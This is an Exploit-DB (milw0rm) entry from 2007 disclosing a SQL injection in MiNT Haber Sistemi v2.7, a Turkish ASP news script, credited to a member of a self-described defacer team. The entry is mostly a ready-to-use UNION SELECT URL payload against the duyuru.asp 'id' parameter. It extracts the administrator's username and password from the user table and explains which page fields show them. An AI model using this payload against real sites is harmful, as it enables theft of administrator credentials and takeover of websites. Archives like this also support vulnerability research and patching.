Mint Haber Sistemi 2.7 - 'duyuru.asp?id' SQL Injection

EDB-ID:

3120




Platform:

PHP

Date:

2007-01-12


###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]